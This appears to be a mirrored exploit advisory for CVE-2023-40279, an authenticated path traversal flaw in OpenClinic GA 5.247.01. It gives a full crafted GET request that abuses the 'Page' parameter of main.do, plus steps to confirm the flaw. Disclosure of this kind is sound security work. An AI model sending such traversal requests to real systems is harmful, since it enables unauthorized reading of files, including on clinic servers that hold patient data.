OpenClinic GA 5.247.01 Path Traversal (Authenticated)
2024-4-16 04:17:9 Author: cxsecurity.com(查看原文) 阅读量:5 收藏

OpenClinic GA 5.247.01 Path Traversal (Authenticated)

# Exploit Title: OpenClinic GA 5.247.01 - Path Traversal (Authenticated) # Date: 2023-08-14 # Exploit Author: V. B. # Vendor Homepage: https://sourceforge.net/projects/open-clinic/ # Software Link: https://sourceforge.net/projects/open-clinic/ # Version: OpenClinic GA 5.247.01 # Tested on: Windows 10, Windows 11 # CVE: CVE-2023-40279 # Details An issue was discovered in OpenClinic GA version 5.247.01, where an attacker can perform a directory path traversal via the 'Page' parameter in a GET request to 'main.do'. This vulnerability allows for the retrieval and execution of files from arbitrary directories. # Proof of Concept (POC) Steps to Reproduce: - Crafting the Malicious GET Request: - Utilize a web browser or a tool capable of sending custom HTTP requests, such as curl or Burp Suite. - Format the GET request as follows (in this example, `../../main.jsp` is used to attempt directory traversal to access `main.jsp`): GET /openclinic/main.do?Page=../../main.jsp HTTP/1.1 Host: 192.168.100.5:10088 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 Connection: close Cookie: JSESSIONID=[SESSION ID] Cache-Control: max-age=0 2. Confirming the Vulnerability: - Send the crafted GET request to the target server. - If the server responds with the content of the requested file (e.g., `main.jsp`) from outside the intended directory, it confirms the presence of a directory path traversal vulnerability. - This vulnerability can lead to sensitive information disclosure or more severe attacks.



 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


文章来源: https://cxsecurity.com/issue/WLB-2024040040
如有侵权请联系:admin#unsafe.sh